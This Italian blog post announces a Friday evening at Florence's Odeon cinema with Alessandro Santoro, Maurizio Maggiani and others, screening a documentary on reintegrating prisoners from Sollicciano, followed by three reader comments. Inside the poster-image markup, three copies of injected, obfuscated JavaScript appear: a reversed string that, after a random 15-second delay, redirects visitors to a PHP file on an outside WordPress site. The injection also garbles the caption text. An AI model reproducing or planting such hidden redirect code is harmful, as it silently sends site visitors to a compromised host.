Alessandro Santoro torna a Firenze. Con Compagni di viaggio, venerdì all'Odeon

image_pdfimage_print

Compagni di viaggio – la fantasia della fedeltà
Venerdì 5 febbraio, ore 21 al Cinema Odeon di Firenze

) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andina della serata”]$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/01/LOCANDINA_ODEON-MEDIATECA.jpg”>La loc<script type=$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andina della serata” width=”150″ height=”150″ />

Uno scrittore, Maurizio Maggiani, un viaggiatore, Folco Terzani, tre preti Andrea Bigalli, Gigi Verdi e Alessandro Santoro. Insieme per raccontare il viaggio della vita.

A seguire il film documentario “Compagni di Viaggio” edito dalla Comunità delle Piagge per il reinserimento dei detenuti e delle detenute del carcere di Sollicciano. Per capire come talvolta la Chiesa può anche stare dalla parte degli ultimi.

Non mancate!

0 Comments

  1. Marco Romoli

    verrò il 5 all’Odeon, anche se avrei dovuto essere al concerto a San Salvatore in sostegno di Baan Unrak, vorra’ dire che acquisterò il biglietto e lo regalerò a qualcun altro

    Reply
  2. Piera

    Purtroppo non abito a Firenze e quindi non potrò essere presente. Lo sarò “in spirito”, anche se non è la stessa cosa! Ma spero in un dettagliato reportage della serata su Altracittà: sarà senz’altro un incontro interessantissimo, di quelli che lasciano il segno in chi vi partecipa.

    Reply
  3. GABI

    ho partecipato alla serata all’Odeon e vorrei far sentire anche quello che è stato detto prima e dopo la proiezione del dvd ad amici che non c’erano. quindi mi chiedevo se ci sono delle registrazioni da scaricare ??
    Bellissima serata, nutriente!! grazie a tutti

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *